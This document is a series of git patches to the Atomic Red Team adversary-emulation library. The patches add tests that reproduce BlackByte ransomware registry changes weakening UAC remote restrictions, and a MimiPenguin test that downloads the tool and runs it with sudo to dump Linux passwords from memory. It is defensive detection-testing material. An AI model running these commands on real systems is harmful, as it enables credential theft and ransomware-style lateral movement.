           reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
         name: command_prompt
         elevation_required: true
+    - name: BlackByte Ransomware Registry Changes - Powershell
+      auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
+      description: |
+        This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+        The steps are as follows:
+        <ol>
+            <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+            <li>2. Enable OS to share network connections between different privilege levels</li>
+            <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+        </ol>
+        The registry keys and their respective values will be created upon successful execution.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+        cleanup_command: |
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
+          Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       external_references:
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 44587434..bdc6033e 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -24,6 +24,8 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-7---blackbyte-ransomware-registry-changes---cmd)
 
+- [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell)
+
 
 <br/>
 
@@ -291,4 +293,47 @@ reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell
+This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+The steps are as follows:
+<ol>
+    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+    <li>2. Enable OS to share network connections between different privilege levels</li>
+    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+</ol>
+The registry keys and their respective values will be created upon successful execution.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0b79c06f-c788-44a2-8630-d69051f1123d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
+Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+```
+
+
+
+
+
 <br/>

From 42dd141032f2e60c4292e5942fd97dd39af59581 Mon Sep 17 00:00:00 2001
From: SecWilson <47117894+SecWilson@users.noreply.github.com>
Date: Mon, 7 Mar 2022 19:32:31 -0600
Subject: [PATCH 15/83] Fixing Blackbyte Cleanup Commands (#1802)

Co-authored-by: Wilson <SWilson@nti.local>
---
 atomics/T1112/T1112.yaml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 0f10ccb5..22f0acff 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -127,9 +127,9 @@ atomic_tests:
       cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
       cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
     cleanup_command: |
-      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
-      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
-      reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
+      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
+      reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
     name: command_prompt
     elevation_required: true
 - name: BlackByte Ransomware Registry Changes - Powershell
@@ -151,8 +151,8 @@ atomic_tests:
       New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
       New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
     cleanup_command: |
-      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
-      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
-      Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
     name: powershell
     elevation_required: true

From 6052b5118a647d336e4c814feb40e73e6b21177f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Tue, 8 Mar 2022 01:33:09 +0000
Subject: [PATCH 16/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml | 12 ++++++------
 atomics/T1112/T1112.md     | 12 ++++++------
 2 files changed, 12 insertions(+), 12 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 41480ad8..e1077627 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31586,9 +31586,9 @@ defense-evasion:
           cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
           cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
         cleanup_command: |
-          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
-          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
-          reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
+          reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
         name: command_prompt
         elevation_required: true
     - name: BlackByte Ransomware Registry Changes - Powershell
@@ -31610,9 +31610,9 @@ defense-evasion:
           New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
           New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
         cleanup_command: |
-          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
-          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
-          Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
+          Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
         name: powershell
         elevation_required: true
   T1601:
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index bdc6033e..7c1dfe05 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -284,9 +284,9 @@ cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPaths
 
 #### Cleanup Commands:
 ```cmd
-reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
-reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
-reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
+reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
 ```
 
 
@@ -327,9 +327,9 @@ New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongP
 
 #### Cleanup Commands:
 ```powershell
-Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
-Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
-Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
 ```
 
 

From af719c41d24bf2d3d773802bb37478c1735ec769 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy <esanya.araveti@kudelskisecurity.com>
Date: Tue, 8 Mar 2022 17:57:22 +0530
Subject: [PATCH 17/83] udpated azure eventhub deletion scenario

---
 atomics/T1562.001/T1562.001.yaml | 50 +++++++++++++++++++++++++++++++-
 1 file changed, 49 insertions(+), 1 deletion(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 8421e1e0..947889a3 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -573,4 +573,52 @@ atomic_tests:
     cleanup_command: |
       cmd /c #{DefenderControlExe} /E | Out-Null
     name: powershell
-    elevation_required: true  
+    elevation_required: true
+- name: Azure-Defense-Evasion-Eventhub-Deletion
+  auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
+  description: |
+    Identifies an Event Hub deletion in Azure
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Azure username
+      type: String
+      default: null
+    password:
+      description: Azure password
+      type: String
+      default: null
+    event_hub_name:
+      description: Name of the eventhub
+      type: String
+      default: "test_eventhub"
+    resource_group:
+      description: Name of the resource group
+      type: String
+      default: null
+    name_space_name:
+      description: Name of the NameSpace
+      type: String
+      default: null
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Install-Module -Name Az
+    prereq_command: |
+      try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force       
+  executor:
+    command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-AzureAD -Credential $creds
+      New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
+    cleanup_command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-AzureAD -Credential $creds
+      Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
+    name: powershell
+    elevation_required: false  

From 5148b9db57d15cdbfa6d505fba42f9efc5aa74d6 Mon Sep 17 00:00:00 2001
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com>
Date: Wed, 9 Mar 2022 10:15:17 -0600
Subject: [PATCH 18/83] Adding T1003.007 Test 3 - MimiPenguin Usage (#1804)

Adding T1003.007 Test 3 - Capture Passwords with MimiPenguin. This test is designed to run the MimiPenguin script, which takes advantage of a vulnerability in Ubuntu-based distros, as well as certain versions of GNOME Keyring, in order to capture passwords in cleartext. Upon successful execution, user passwords will be exported to a file and displayed on-screen.
---
 atomics/T1003.007/T1003.007.yaml | 53 ++++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)

diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml
index fbadc564..3f656755 100644
--- a/atomics/T1003.007/T1003.007.yaml
+++ b/atomics/T1003.007/T1003.007.yaml
@@ -104,3 +104,56 @@ atomic_tests:
       grep -i "PASS" "#{output_file}"
     cleanup_command: |
       rm -f "#{output_file}"
+- name: Capture Passwords with MimiPenguin
+  description: |
+    MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
+    Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
+    See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
+    See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
+  supported_platforms:
+  - linux
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007Test3.txt
+    MimiPenguin_Location:
+      description: Path of MimiPenguin script
+      type: Path
+      default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
+    prereq_command: |
+      if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+      mkdir /tmp/mimipenguin
+      tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+  - description: |
+      Strings must be installed
+    prereq_command: |
+      if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install binutils
+  - description: |
+      Python2 must be installed
+    prereq_command: |
+      if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install python2       
+  - description: |
+      Libc-bin must be installed
+    prereq_command: |
+      if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install libc-bin        
+  executor:
+    command: |
+      sudo #{MimiPenguin_Location} > #{output_file}
+      cat #{output_file}
+    cleanup_command: |
+      rm -f #{output_file} > /dev/null
+    name: bash
+    elevation_required: true

From 455cd5837eb9dca5d53045788adb2b6ecae1434a Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Wed, 9 Mar 2022 16:15:58 +0000
Subject: [PATCH 19/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1003.007/T1003.007.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml
index 3f656755..a5bcee80 100644
--- a/atomics/T1003.007/T1003.007.yaml
+++ b/atomics/T1003.007/T1003.007.yaml
@@ -105,6 +105,7 @@ atomic_tests:
     cleanup_command: |
       rm -f "#{output_file}"
 - name: Capture Passwords with MimiPenguin
+  auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
   description: |
     MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
     Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 5c8dfb49..7a3a3bc4 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -883,3 +883,4 @@ e895677d-4f06-49ab-91b6-ae3742d0a2ba
 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
 0b79c06f-c788-44a2-8630-d69051f1123d
+a27418de-bdce-4ebd-b655-38f04842bf0c

From 82df99e7c8addd8620d5ecbb1ca38b594bd28d8f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 9 Mar 2022 16:16:04 +0000
Subject: [PATCH 20/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/linux-index.csv   |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/linux-index.md   |  1 +
 atomics/Indexes/index.yaml                    | 67 +++++++++++++++
 atomics/T1003.007/T1003.007.md                | 85 +++++++++++++++++++
 6 files changed, 156 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 1e582b39..0a6f7538 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -102,6 +102,7 @@ credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption cer
 credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 437ccce7..525ea1fa 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -27,6 +27,7 @@ credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864b
 credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index f6f7eabc..253ca895 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -146,6 +146,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
   - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
   - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+  - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
   - Atomic Test #1: Golden SAML [azure-ad]
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 130436db..a467540a 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -54,6 +54,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
   - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
   - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+  - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
   - Atomic Test #1: Golden SAML [azure-ad]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e1077627..26376790 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -6299,6 +6299,73 @@ credential-access:
         cleanup_command: 'rm -f "#{output_file}"
 
 '
+    - name: Capture Passwords with MimiPenguin
+      auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
+      description: "MimiPenguin is a tool inspired by MimiKatz that targets Linux
+        systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions
+        of GNOME Keyring). \nUpon successful execution on an affected system, MimiPenguin
+        will retrieve passwords from memory and output them to a specified file. \nSee
+        https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. \nSee https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007Test3.txt"
+        MimiPenguin_Location:
+          description: Path of MimiPenguin script
+          type: Path
+          default: "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'MimiPenguin script must exist on disk at specified location
+          (#{MimiPenguin_Location})
+
+'
+        prereq_command: 'if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: |
+          wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+          mkdir /tmp/mimipenguin
+          tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+      - description: 'Strings must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v strings --version)" ]; then exit 0;
+          else exit 1; fi;
+
+'
+        get_prereq_command: 'sudo apt-get -y install binutils
+
+'
+      - description: 'Python2 must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v python2 --version)" ]; then exit 0;
+          else exit 1; fi;
+
+'
+        get_prereq_command: "sudo apt-get -y install python2       \n"
+      - description: 'Libc-bin must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v ldd --version)" ]; then exit 0; else
+          exit 1; fi;
+
+'
+        get_prereq_command: "sudo apt-get -y install libc-bin        \n"
+      executor:
+        command: |
+          sudo #{MimiPenguin_Location} > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'rm -f #{output_file} > /dev/null
+
+'
+        name: bash
+        elevation_required: true
   T1606.002:
     technique:
       external_references:
diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md
index d2d5875d..c07b000b 100644
--- a/atomics/T1003.007/T1003.007.md
+++ b/atomics/T1003.007/T1003.007.md
@@ -10,6 +10,8 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
 
 - [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
 
+- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin)
+
 
 <br/>
 
@@ -139,4 +141,87 @@ echo "Python 2.7+ or 3.4+ must be installed"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Capture Passwords with MimiPenguin
+MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
+Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
+See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
+See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt|
+| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sudo #{MimiPenguin_Location} > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```bash
+rm -f #{output_file} > /dev/null
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
+##### Check Prereq Commands:
+```sh
+if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+mkdir /tmp/mimipenguin
+tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+```
+##### Description: Strings must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install binutils
+```
